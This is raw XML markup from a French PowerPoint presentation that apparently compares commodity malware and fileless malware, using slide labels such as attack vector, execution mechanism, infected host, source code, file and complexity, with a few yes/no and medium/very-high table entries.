        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vecteur d’attaque</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="TextBox 61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9509088" y="4203184"/>
            <a:ext cx="2520242" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mécanisme d’exécution</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="TextBox 62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9710057" y="6046916"/>
            <a:ext cx="1516762" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hôte infectée</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1868151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a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2996638" y="2592320"/>
            <a:ext cx="507540" cy="130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07" y="2295087"/>
            <a:ext cx="594465" cy="59446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860448114"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3639736" y="2080008"/>
          <a:ext cx="8128000" cy="2961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813187492"/>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2720333836"/>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977224267"/>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486711998"/>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4283291729"/>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2222012658"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2424938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67378818"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1680306" y="2074928"/>
          <a:ext cx="1143279" cy="296672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Code source</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3069284132"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2084593043"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3214466422"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2403847838"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="272654546"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2656580963"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2300699035"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9418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a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3015937" y="2538128"/>
            <a:ext cx="450746" cy="104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26" y="2291096"/>
            <a:ext cx="565592" cy="56559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296467009"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3639736" y="2080008"/>
          <a:ext cx="8128000" cy="2961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813187492"/>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2720333836"/>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977224267"/>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486711998"/>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4283291729"/>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2222012658"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="242493804"/>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26" y="2760310"/>
            <a:ext cx="486477" cy="486477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Right Arrow 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3015937" y="2931158"/>
            <a:ext cx="450746" cy="113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8" name="Table 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3872253926"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1680306" y="2074928"/>
          <a:ext cx="1143279" cy="296672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Code source</a:t>
                      </a:r>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Fichier </a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2084593043"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3214466422"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2403847838"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="272654546"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2656580963"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2300699035"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2791827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a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3014504" y="253812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26" y="2291096"/>
            <a:ext cx="565592" cy="56559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426915734"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3639736" y="2080008"/>
          <a:ext cx="8128000" cy="2961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813187492"/>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2720333836"/>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977224267"/>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486711998"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4283291729"/>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2222012658"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="242493804"/>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26" y="2760310"/>
            <a:ext cx="486477" cy="486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22" y="3246787"/>
            <a:ext cx="360035" cy="36003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660505306"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1680306" y="2074928"/>
          <a:ext cx="1143279" cy="296672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Code source</a:t>
                      </a:r>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Fichier</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2084593043"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Procès</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3214466422"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2403847838"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="272654546"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2656580963"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2300699035"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3014504" y="300354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ight Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3014504" y="3354331"/>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7713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RECAP</a:t>
            </a:r>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26" y="2291096"/>
            <a:ext cx="565592" cy="56559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106036406"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3639736" y="2080008"/>
          <a:ext cx="8128000" cy="2961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8399080"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4064000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1942901840"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="276590">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>COMMODITY MALWARE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>FILELESS MALWARE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="466871323"/>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813187492"/>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2720333836"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Oui</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Non</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="977224267"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Moyenne</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
                        <a:t>Très haute</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="486711998"/>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4283291729"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2222012658"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="242493804"/>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26" y="2760310"/>
            <a:ext cx="456413" cy="4564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36" y="3191604"/>
            <a:ext cx="319842" cy="31984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426" y="3529386"/>
            <a:ext cx="456413" cy="456413"/>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2731315237"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1680306" y="2074928"/>
          <a:ext cx="1143279" cy="2966720"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143279">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3701244053"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="429377034"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Code source</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3069284132"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Fichier</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2084593043"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Procès</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3214466422"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Complexité</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2403847838"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
